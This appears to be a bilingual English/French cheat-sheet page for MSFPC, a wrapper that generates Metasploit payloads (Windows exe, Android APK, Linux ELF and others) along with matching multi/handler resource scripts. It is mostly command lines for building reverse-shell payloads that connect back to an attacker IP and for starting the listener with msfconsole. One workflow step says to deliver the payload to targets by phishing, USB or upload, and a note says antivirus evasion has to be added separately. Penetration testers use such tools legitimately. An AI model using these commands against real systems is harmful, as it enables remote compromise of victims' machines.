MSFvenom Payload Creator (MSFPC)

Wrapper autour de msfvenom qui simplifie la génération des payloads Metasploit courants (exe, apk, war, etc.) avec les fichiers de ressources handler correspondants. Wrapper around msfvenom that simplifies generating common Metasploit payloads (exe, apk, war, etc.) with matching handler resource files.

↗ https://github.com/g0tmi1k/msfpc

Overview

MSFPC wraps msfvenom to remove the friction of remembering exact payload names, encoders, and format flags. Give it a platform (or let it guess from a file extension) and an IP/port, and it generates the appropriate payload file plus a ready-to-use .rc resource script for multi/handler — so you can go from “I need a Windows exe payload” to a working listener in one command instead of hand-assembling the msfvenom invocation.

Common Usage

Auto-detect platform from output filename, staged TCP payload

msfpc.sh windows 10.10.14.5

Explicit payload type: Android APK, staged, reverse HTTPS

msfpc.sh apk 10.10.14.5 443 https

Linux ELF, x64, reverse TCP

msfpc.sh elf x64 10.10.14.5 4444 tcp

Stageless payload

msfpc.sh windows 10.10.14.5 4444 tcp stageless

Auto-start a matching multi/handler listener immediately after generation

msfpc.sh windows 10.10.14.5 loop

Typical Workflow

  1. Generate payload + handler resource script
msfpc.sh windows 10.10.14.5 4444 tcp exe
# 2. Deliver the generated .exe to the target (phishing, USB, upload, etc.)
  1. Start the matching listener using the auto-generated .rc file
msfconsole -r windows-meterpreter-staged-reverse-tcp-10.10.14.5-4444.rc

Notes

  • Output filenames encode the payload type/platform/architecture/LHOST/LPORT, making it easy to track which listener matches which generated file.
  • loop mode keeps prompting for more payloads without re-entering flags, handy for generating several variants quickly.
  • Under the hood it’s still msfvenom — encoding/obfuscation for AV evasion still needs to be layered on separately (it does not do that by itself).
Help / Man page
msfpc.sh <TYPE> <LHOST> <LPORT> <CMD> <STAGE> <METHOD> <OUTPATH> <BATCH> <LOOP> <VERBOSE> <HELP>

  TYPE      apk, asp, aspx, bash, exe, dll, elf, jar, jsp,
            osx, php, powershell, python, war, ...
  LHOST     Local IP for the reverse connection (or 0.0.0.0 for bind)
  LPORT     Local port (default: 443)
  CMD       tcp | http | https | findport | ...
  STAGE     staged | stageless
  METHOD    reverse | bind
  BATCH     Generate for all platforms at once
  LOOP      Keep generating payloads in a loop
  VERBOSE   -v   Verbose output
  HELP      -h   Show help

Vue d’ensemble

MSFPC encapsule msfvenom pour éviter d’avoir à retenir les noms exacts des payloads, des encodeurs et des flags de format. Donnez-lui une plateforme (ou laissez-le la deviner depuis l’extension du fichier) ainsi qu’une IP/port, et il génère le fichier de payload approprié plus un script de ressources .rc prêt à l’emploi pour multi/handler : passez ainsi de « j’ai besoin d’un payload exe Windows » à un listener fonctionnel en une seule commande, au lieu d’assembler manuellement l’invocation msfvenom.

Utilisation courante

# Détection automatique de la plateforme depuis le nom de fichier de sortie, payload TCP staged
msfpc.sh windows 10.10.14.5

# Type de payload explicite : APK Android, staged, reverse HTTPS
msfpc.sh apk 10.10.14.5 443 https

# ELF Linux, x64, reverse TCP
msfpc.sh elf x64 10.10.14.5 4444 tcp

# Payload stageless
msfpc.sh windows 10.10.14.5 4444 tcp stageless

# Démarrer automatiquement un listener multi/handler correspondant juste après la génération
msfpc.sh windows 10.10.14.5 loop

Flux de travail typique

# 1. Générer le payload + le script de ressources handler
msfpc.sh windows 10.10.14.5 4444 tcp exe

# 2. Livrer le fichier .exe généré à la cible (phishing, USB, upload, etc.)

# 3. Démarrer le listener correspondant avec le fichier .rc généré automatiquement
msfconsole -r windows-meterpreter-staged-reverse-tcp-10.10.14.5-4444.rc

Remarques

  • Les noms de fichiers de sortie encodent le type de payload/plateforme/architecture/LHOST/LPORT, ce qui facilite le suivi entre listener et fichier généré.
  • Le mode loop continue de demander d’autres payloads sans avoir à ressaisir les flags, pratique pour générer rapidement plusieurs variantes.
  • Sous le capot, c’est toujours msfvenom : l’encodage/l’obfuscation pour l’évasion AV doit toujours être ajouté séparément (MSFPC ne le fait pas lui-même).
Aide / Page de manuel
msfpc.sh <TYPE> <LHOST> <LPORT> <CMD> <STAGE> <METHOD> <OUTPATH> <BATCH> <LOOP> <VERBOSE> <HELP>

  TYPE      apk, asp, aspx, bash, exe, dll, elf, jar, jsp,
            osx, php, powershell, python, war, ...
  LHOST     Local IP for the reverse connection (or 0.0.0.0 for bind)
  LPORT     Local port (default: 443)
  CMD       tcp | http | https | findport | ...
  STAGE     staged | stageless
  METHOD    reverse | bind
  BATCH     Generate for all platforms at once
  LOOP      Keep generating payloads in a loop
  VERBOSE   -v   Verbose output
  HELP      -h   Show help